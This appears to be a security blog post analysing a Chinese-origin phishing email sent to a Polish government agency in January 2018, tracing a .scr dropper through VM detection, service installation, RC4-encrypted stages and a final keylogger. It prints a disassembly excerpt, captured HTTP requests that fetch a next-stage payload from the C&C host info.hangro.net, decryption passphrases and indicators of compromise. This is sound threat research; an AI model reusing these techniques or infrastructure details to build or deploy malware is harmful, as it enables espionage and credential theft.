niedziela, 18 marca 2018

Happy New Year wishes from China

At the end of January 2018 one of government agencies in Poland received an email with new year’s wishes from one of Chinese government agency. The content of the email is definitely suspicious so we decided to perform deeper analysis of this attempt of attack.


First of all we have to understand an email header. The received entries are the most important part of email because received lines contain a list of all hosts through which the message travelled. We can notice that the real source IP address of sender is 39.109.6.203. So probably the misconfiguration of one of Chinese server permitted to spoof an email address of a sender.

Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)


The next step was to analyse attached rar archive file. It was composed only of one file named Happy 2018.scr. After execution we can see a nice picture with wishes (presented at the beginning of this article).
JPG file is stored in a resource section .rsrc of the scr file. Malware often stores an embedded program or configuration ata in this section. API function names were obfuscated but finally we noticed that to handle resource objects the following API calls were used: FreeResource(), LockResource(), LoadResource(), FindResourceA(), SizeOfResource().


In the same time malware reads SYSTEM\CurrentControlSet\Services\disk\Enum registry key. It is known trick to detect virtual machines.


By using LoadLibraryA() and GetProcAddress() APIs other API functions are resolved: OpenServiceA(), StartServiceA(), OpenSCManagerA(), QueryServiceStatus(), ControlService(), CloseServiceHandle(), CreateServiceA(), RegOpenKeyExA(), RegCloseKey(), RegSetValueExA(), RegQueryValueA(), RegCreateKeyA(), RegEnumValueA().
If malware does not detect virtual machine, new service will be installed. The service name is Avriax with description Multiple defender service with one windows service. The following execution command is added to Windows registers: %SystemRoot%\system32\svchost -k Avriax. A dll file is a second stage malware. It is copied from BIN resource section of scr file. This file is encrypted by using RC4 algorithm with passphrase “ULoveVas”. After installation the service is started immediately.

00402A97  |. FF15 70504000  CALL DWORD PTR DS:[405070]               ;  ADVAPI32.OpenSCManagerA
00402A9D  |. 8BF8           MOV EDI,EAX
00402A9F  |. 85FF           TEST EDI,EDI
00402AA1  |. 74 32          JE SHORT Happy_20.00402AD5
00402AA3  |. 8B4424 08      MOV EAX,DWORD PTR SS:[ESP+8]
00402AA7  |. 56             PUSH ESI
00402AA8  |. 68 10000100    PUSH 10010
00402AAD  |. 50             PUSH EAX
00402AAE  |. 57             PUSH EDI
00402AAF  |. FF15 74504000  CALL DWORD PTR DS:[405074]               ;  ADVAPI32.OpenServiceA
00402AB5  |. 8BF0           MOV ESI,EAX
00402AB7  |. 85F6           TEST ESI,ESI
00402AB9  |. 74 12          JE SHORT Happy_20.00402ACD
00402ABB  |. 6A 00          PUSH 0
00402ABD  |. 6A 00          PUSH 0
00402ABF  |. 56             PUSH ESI
00402AC0  |. FF15 80504000  CALL DWORD PTR DS:[405080]               ;  ADVAPI32.StartServiceA


Malware connects to C&C server and downloads another file - 30_1.exe. Info.hangro.net has the same IP address 39.109.6.203.

GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="robots.txt"
Content-Type: application/x-msdownload
Content-Length: 10
Date: Wed, 31 Jan 2018 18:29:18 GMT

30_1.exe
GET /session/manager?mode=30_1.exe&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache


Downloaded file is also encrypted by using RC4 algorithm. The passphrase is “Higaisakora.0”. After decrypting executable file is executed by using CreateProcessA() API from the following location C:\Windows\TEMP directory. All strings in this file are encoded. The decoding instructions are presented below:


On below example we can see another decoded window service name. The second service will be installed by new malware file.


The functionality of exe file is easily identified by looking at decoded API names.


Executable file contains also new resource – one more dll file. This time malicious dll library is not encrypted. We can use CFF Explorer to extract new library.


The dll file is store in C:\Users\<username>\AppData\Roaming\System\hpptx386.dll and new service named HP Printer Software is created. This is the last stage of infection.
DLL file is a keylogger. All data are stored in Info.dat file and send to C&C host vachel.vicp.cc [IP: 39.109.6.203].There are several methods of implementing keyloggers in Windows. Method used in described example is based on GetAsyncKeyState() and GetKeyState(). Mentioned functions are used to query the status of all keys.


Basic IoC are listed below:
  • (Happy 2018 .scr) SHA1: 511F7BC170C596AD1A26D616359A78851EB7881B
  • (Avriax32.dll) SHA1: 2FB33BF79BCACA2445F66769C5261037C2EF92E2
  • (30_1.exe - encrypted) SHA1: 82BAC0B378285F914C518F39F54DA3E4A7A54588
  • (decrypted) SHA1: F372CE319060F103714D0F8897F846452786BB31
  • (hpptx386.dll) SHA1: 83B995717F82F97D3A65C7E6FBFB59908EEDE811
  • 39.109.6.203
  • info.hangro.net
  • vachel.vicp.cc